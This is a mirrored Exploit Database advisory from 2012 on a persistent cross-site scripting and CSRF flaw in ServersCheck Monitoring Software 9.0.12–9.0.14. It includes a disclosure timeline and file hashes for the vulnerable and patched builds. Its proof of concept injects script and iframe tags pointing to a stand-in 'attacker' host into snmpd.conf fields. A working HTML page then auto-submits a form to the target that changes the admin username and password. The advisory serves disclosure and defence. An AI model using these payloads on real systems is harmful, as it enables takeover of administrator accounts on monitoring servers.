ServersCheck Monitoring Software 9.0.12/9.0.14 – Persistent Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： loneferret
  日期： 2012-10-10
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/21866/

• # Author: loneferret of Offensive Security
  # Product: ServersCheck Monitoring Software
  # Version: 9.0.12 - 9.0.14 (some versions of 9.0.15)
  # Vendor Site: http://www.serverscheck.com
  # Software Download: http://www.serverscheck.com/monitoring_software/download.asp
  # Note: Older Appliances may be affected.
  
  # Discovered: August 18th 2012
  # Disclosure: 
  # August 18th 2012: Reported to CERT
  # September 5th 2012: Tentative disclosure date October 10th 2012
  # September 5th 2012: Vendor requesting information/procedure on how to reproduce
  # September 5th 2012: Sent vendor procedures
  # September 5th 2012: Vendor says newer version not affected
  # September 5th 2012: Tested new version, conclusion still affected
  # September 5th 2012: Newer s-server.exe file supplied/tested version is patched.
  # September 6th 2012: 9.0.15 download version is now patched.
  # October 10th 2012: Public release
  
  
  # Software Description:
  # The core of our Monitoring Solution is the award winning ServersCheck Monitoring Software. 
  # This software enables you to monitor any networked device for its availability 
  # and performance. It is agentless: no need to have agents installed on the remote 
  # systems being monitored. It can run on your own Windows system or you can 
  # get it as a box: the ServersCheck Monitoring Appliance. 
  
  # Vulnerabilities:
  # The file responsible the vulnerability is called "s-server.exe".
  # From the 3 versions tested the file's version does not change, so looking at the 
  # MD5 hash can help us determine if an installation is using vulnerable file.
  # One can only assume that 9.0.13 is vulnerable.
  # Versions 9.0.12 & 9.0.14 & 9.0.15 (vulnerable): 
  # s-server.exe HASH: MD5 (s-server.exe) = af38d77e0b150d96f68cba4c3e65f316
  # Version 9.0.15 (patched):
  # s-server.exe HASH: MD5 (s-server.exe) = 3e01ff7201df4eb1c0091784a40f3055
  
  # PoC:
  # Store XSS & Cross Site Request Forgery
  # The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
  # JavaScript file. 
  # ..
  # syslocation <script src="http://attacker/xss.js"></script>
  # syscontact <iframe src="http://attacker/scheck-csrf.html"></iframe>
  
  # CSRF PoC:
  # We can also use the previous XSS to trigger this. Makes for a funny.
  # Change Admin credentials
  # File scheck-csrf.html
  <html>
   <body onload="trigger()">
   <script>
  function trigger() {
  document.getElementById('bad_form').submit();
  }
   </script>
   <form id="bad_form" method="post" action="http://target:1272/settings2.html">
  <input name="systemsetting" value="secure" type="hidden">
  <input name="setting" value="SECURE" type="hidden">
  <input value="ok" name="changedsettings" type="hidden">
  <input name="systemsetting" value="SECURE" type="hidden">
  <input name="XYXadminuser" size="30" value="loneferret" type="hidden"><br>
  <input name="adminpass" size="30" value="123456" type="hidden"><br>
   </form>
   </body>
  </html>